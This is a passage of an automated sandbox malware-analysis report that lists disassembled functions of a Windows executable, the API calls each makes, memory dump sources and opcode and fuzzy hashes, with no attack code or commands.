                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3440857362-0
                                                                                                                                                                                      • Opcode ID: 7e6bb20b8b9577d31950c130fd80c2c9264f5aec1309ccfc7cc1cca34250d38d
                                                                                                                                                                                      • Instruction ID: cad0e15a93d0b1a7aa1b0a4adb5fa01d8100cad068e377052062e40fb7e1cdfc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e6bb20b8b9577d31950c130fd80c2c9264f5aec1309ccfc7cc1cca34250d38d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F515A71218204AFD705EFA4C891F6BB7E8FF88304F04492EF5968B2A1DB35E905CB52
                                                                                                                                                                                      Function 0096CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: cbb78a2241bf4f67de43ee1f4f2c59ef9391bc9e5d1796dea1849c61d25101c1
                                                                                                                                                                                      • Instruction ID: eb4d1eee3263f908aaab6f2bd6a22313b18d63d0a5399e5d2951b84e6cceb6a6
                                                                                                                                                                                      • Opcode Fuzzy Hash: cbb78a2241bf4f67de43ee1f4f2c59ef9391bc9e5d1796dea1849c61d25101c1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E41D3B5E04104BFD724DB78CC49FB9BB69EB0A320F154666F999A72E1C734AD00E750
                                                                                                                                                                                      Function 00951726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009517D4
                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009517FD
                                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0095183C
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00951861
                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00951869
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1389676194-0
                                                                                                                                                                                      • Opcode ID: 8e6acaa525a532d550c7cf17282e226674ba81e53b437e46e97d1f2f878dba00
                                                                                                                                                                                      • Instruction ID: a1db45c0ade41a5daabb0dacc85a3fecd69bdcef743890a9d8f97c659fc0a01e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e6acaa525a532d550c7cf17282e226674ba81e53b437e46e97d1f2f878dba00
                                                                                                                                                                                      • Instruction Fuzzy Hash: 24412C75A00205EFCB11EF64C981EAEBBF5FF48310B148099E946AB3A1DB31ED51DB50
                                                                                                                                                                                      Function 0091B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCursorPos.USER32(000000FF), ref: 0091B749
                                                                                                                                                                                      • ScreenToClient.USER32(00000000,000000FF), ref: 0091B766
                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 0091B78B
                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 0091B799
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4210589936-0
                                                                                                                                                                                      • Opcode ID: f8b9095c2930009eee2fd40ad479c660fab72ae1db07933be7770bc881da0d1a
                                                                                                                                                                                      • Instruction ID: 8c3466ea79cd6ce3d322102a3e37861b14c0970084d5ea882c622be2983decb1
                                                                                                                                                                                      • Opcode Fuzzy Hash: f8b9095c2930009eee2fd40ad479c660fab72ae1db07933be7770bc881da0d1a
                                                                                                                                                                                      • Instruction Fuzzy Hash: FF417E75604219FFDF159F64C884EEABBB9BF49320F108759F829962D0C734A990DBA0
                                                                                                                                                                                      Function 0093C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0093C156
                                                                                                                                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 0093C200
                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0093C208
                                                                                                                                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 0093C216
                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0093C21E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                                                      • Opcode ID: 8338741c0db91213b057af1cb4764e2c72c1182a52ad1a72ee76f4a934fb69be
                                                                                                                                                                                      • Instruction ID: 44c795408197c5ef7672befd4c34b08994623730ba918888a0fff58de0473555
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8338741c0db91213b057af1cb4764e2c72c1182a52ad1a72ee76f4a934fb69be
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8031AEB150861DEBDB14CFA8DD4DA9E3BB9EF04325F104229F925AA2D1C7B09914EF90
                                                                                                                                                                                      Function 0093E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0093E9CD
                                                                                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0093E9EA
                                                                                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0093EA22
                                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0093EA48
                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 0093EA52
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3902887630-0
                                                                                                                                                                                      • Opcode ID: 6a285ede36e7b01ed39c441ed116317cecde4cb4f25a7c83ec9261ca2a865e5c
                                                                                                                                                                                      • Instruction ID: 330467112cf1dac01a3cd3f003dc3ffeea150f6cd42dfd3e51d4c0d7a630e050
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a285ede36e7b01ed39c441ed116317cecde4cb4f25a7c83ec9261ca2a865e5c
                                                                                                                                                                                      • Instruction Fuzzy Hash: FE213B722082147BEB159B79EC49F7B7BECDF85750F108029F809CA1D1EA70DC409B50
                                                                                                                                                                                      Function 0096DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0091AF8E
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0096DCC0
                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0096DCE4
                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0096DCFC
                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0096DD24
                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0095407D,00000000), ref: 0096DD42
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2294984445-0
                                                                                                                                                                                      • Opcode ID: 5d01d4fc0e51686cb53fa00355db4fdd883680bb586b0a1fb22f429ce6e541c4
                                                                                                                                                                                      • Instruction ID: 6b707d1c725104b52e39f5bae135990a930d8c4d0d7b062251512b25ccf52af5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d01d4fc0e51686cb53fa00355db4fdd883680bb586b0a1fb22f429ce6e541c4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4821C171B1A215AFCB20AF788C58B6937A8FB46374B110B24F936C66E0D3709810DB80
                                                                                                                                                                                      Function 0093CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0093CA86
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0093CAB8
                                                                                                                                                                                      • __itow.LIBCMT ref: 0093CAD0
                                                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0093CAF6
                                                                                                                                                                                      • __itow.LIBCMT ref: 0093CB07
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$__itow$_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2983881199-0
                                                                                                                                                                                      • Opcode ID: 3a325b6aa39f2317cd6a96e486bd37e5de6d22a462bcf606852c4571e03f80e7
                                                                                                                                                                                      • Instruction ID: eb9605ea08f96b1848eaa543eb3b7772636efc04710d5be865bbdd00f8e5fea3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a325b6aa39f2317cd6a96e486bd37e5de6d22a462bcf606852c4571e03f80e7
                                                                                                                                                                                      • Instruction Fuzzy Hash: B821F9B67046187BDB10EAA49C47FDEBB6D9F89750F004025F905F7181E6708D05CBA0
                                                                                                                                                                                      Function 009589AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 009589CE
                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 009589E5
                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00958A21
                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00958A2D
                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00958A68
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4156661090-0
                                                                                                                                                                                      • Opcode ID: f17a495f89947cb84ff57279208c1223362be22d12313807e11a6789e03d9ed3
                                                                                                                                                                                      • Instruction ID: e10373324298b5c390aeeeaef3f84f6a86dfdca49803e2e29194c33feb17d969
                                                                                                                                                                                      • Opcode Fuzzy Hash: f17a495f89947cb84ff57279208c1223362be22d12313807e11a6789e03d9ed3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 32219375A00204AFDB00EF65CC89BAA7BF5EF88301F148479E949D7391DB70AD44DB90
                                                                                                                                                                                      Function 0091B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0091B5EB
                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0091B5FA
                                                                                                                                                                                      • BeginPath.GDI32(?), ref: 0091B611
                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0091B63B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3225163088-0
                                                                                                                                                                                      • Opcode ID: e8a84ca5fc6bbb189312c5f735459ec978d6b02e71a3e15c7c276c42b7a764f4
                                                                                                                                                                                      • Instruction ID: 2d814ff4a40a33b0963e7908799e0bd0d192b8f77652c6288edd5b06036be9e3
                                                                                                                                                                                      • Opcode Fuzzy Hash: e8a84ca5fc6bbb189312c5f735459ec978d6b02e71a3e15c7c276c42b7a764f4
                                                                                                                                                                                      • Instruction Fuzzy Hash: B221BE70E2C309EBDB10AF15ED48BE97BEAFB12365F104116F411921E2C37488D1EB98
                                                                                                                                                                                      Function 00922E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00922E81
                                                                                                                                                                                      • CreateThread.KERNEL32(?,?,00922FB7,00000000,?,?), ref: 00922EC5
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00922ECF
                                                                                                                                                                                      • _free.LIBCMT ref: 00922ED8
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00922EE3
                                                                                                                                                                                        • Part of subcall function 0092889E: __getptd_noexit.LIBCMT ref: 0092889E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2664167353-0
                                                                                                                                                                                      • Opcode ID: 1670192a86dfa1ed5e3878690e418836470273a26b04599290132e02b5191bf9
                                                                                                                                                                                      • Instruction ID: 9a2d193e574db3704794a470576335daf91c1c865b03b1e0839554b8d04109ea
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1670192a86dfa1ed5e3878690e418836470273a26b04599290132e02b5191bf9
                                                                                                                                                                                      • Instruction Fuzzy Hash: B911C432105726BFD721AFA5BC42EAB7BACEF84770B110429FA14C6199EB31D80097A1
                                                                                                                                                                                      Function 0093B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0093B903
                                                                                                                                                                                      • GetLastError.KERNEL32(?,0093B3CB,?,?,?), ref: 0093B90D
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,0093B3CB,?,?,?), ref: 0093B91C
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,0093B3CB,?,?,?), ref: 0093B923
                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0093B93A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 842720411-0
                                                                                                                                                                                      • Opcode ID: 80774e7da5983e33bf7cdbc444dfec5131e55a3dfdfd2736be987e6a801aad9d
                                                                                                                                                                                      • Instruction ID: c30feaa2113731cadf6a2a89b23a0a05d66a67830fcee72d6cc7d5b69f2710eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 80774e7da5983e33bf7cdbc444dfec5131e55a3dfdfd2736be987e6a801aad9d
                                                                                                                                                                                      • Instruction Fuzzy Hash: BD011D71216208BFDB159FA5DC88E6B3BADEF8A768B100429F645C2290DB719C40EB60
                                                                                                                                                                                      Function 00948355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00948371
                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0094837F
                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00948387
                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00948391
                                                                                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009483CD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                                      • Opcode ID: ae2c88be50bc87c33c84108c012501c2250e4c200420377601e901025f946cb8
                                                                                                                                                                                      • Instruction ID: fcede5078a4a410ec297ee18b0d679d8eac575aa9497c3fa1decb14d9c5e3a5d
                                                                                                                                                                                      • Opcode Fuzzy Hash: ae2c88be50bc87c33c84108c012501c2250e4c200420377601e901025f946cb8
                                                                                                                                                                                      • Instruction Fuzzy Hash: E4012971D1961ADBDF04AFE8ED8CAEEBB78FF08B11F000455E542B2290DF7495509BA1
                                                                                                                                                                                      Function 0093A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CLSIDFromProgID.OLE32 ref: 0093A874
                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 0093A88F
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 0093A89D
                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 0093A8AD
                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 0093A8B9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
